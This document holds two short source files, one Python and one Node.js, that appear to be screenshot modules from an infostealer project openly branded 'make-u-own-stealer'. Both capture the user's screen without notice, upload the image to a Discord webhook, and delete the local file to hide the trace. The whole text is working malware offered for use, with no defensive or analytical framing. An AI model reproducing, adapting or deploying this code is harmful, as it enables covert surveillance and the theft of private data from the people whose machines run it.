File: Python/system_info/screenshot.py

import os
from discord_webhook import DiscordWebhook, DiscordEmbed
from PIL import ImageGrab

user = os.path.expanduser("~")
hook ="https://discord.com/api/webhooks/"

def screen():
    sss = ImageGrab.grab()
    temp_path = os.path.join(user, "AppData\\Local\\Temp\\ss.png")
    sss.save(temp_path)

    webhook = DiscordWebhook(url=hook)
    embed = DiscordEmbed(title="Screenshot", description="Latest screenshot capture.", color=242424)
    embed.set_author(name="github.com/lawxsz/make-u-own-stealer", icon_url="https://i.imgur.com/NYWdLg6.png")
    embed.set_image(url="https://i.imgur.com/NYWdLg6.png")
    embed.set_footer(text="Follow on Telegram: t.me/lawxsz | GitHub: github.com/lawxsz")
    webhook.add_embed(embed)
    webhook.execute()

    webhook = DiscordWebhook(url=hook)
    with open(temp_path, "rb") as f:
        webhook.add_file(file=f.read(), filename='ss.png')
    webhook.execute()

    try:
        os.remove(temp_path)
    except Exception as e:
        print(f"Error removing file: {e}")

screen()

File: Python/wallets/js/screenshot.js
const screenshot = require('screenshot-desktop');
const fetch = require('node-fetch');
const FormData = require('form-data');
const fs = require('fs');

const hookUrl = 'https://discord.com/api/webhooks/';

async function sendScreenshot() {
    const filePath = './captura-de-pantalla.png';
    await screenshot({ filename: filePath });

    const form = new FormData();
    form.append('file', fs.createReadStream(filePath));

    const payloadJson = JSON.stringify({
        embeds: [{
            title: "Screenshot",
            description: "Latest screenshot capture.",
            color: 242424,
            author: {
                name: "github.com/lawxsz/make-u-own-stealer",
                icon_url: "https://i.imgur.com/NYWdLg6.png"
            },
            image: {
                url: "attachment://captura-de-pantalla.png"
            },
            footer: {
                text: "Follow on Telegram: t.me/lawxsz | GitHub: github.com/lawxsz"
            }
        }]
    });

    form.append('payload_json', payloadJson);

    const response = await fetch(hookUrl, {
        method: 'POST',
        body: form,
        headers: form.getHeaders()
    });

    if (response.ok) {
        console.log('Screenshot sent to Discord webhook.');
        fs.unlink(filePath, (err) => {
            if (err) {
                console.error('Error deleting file:', err);
            } else {
                console.log('File successfully deleted.');
            }
        });
    } else {
        console.error('Error sending screenshot:', response.statusText);
    }
}

sendScreenshot();
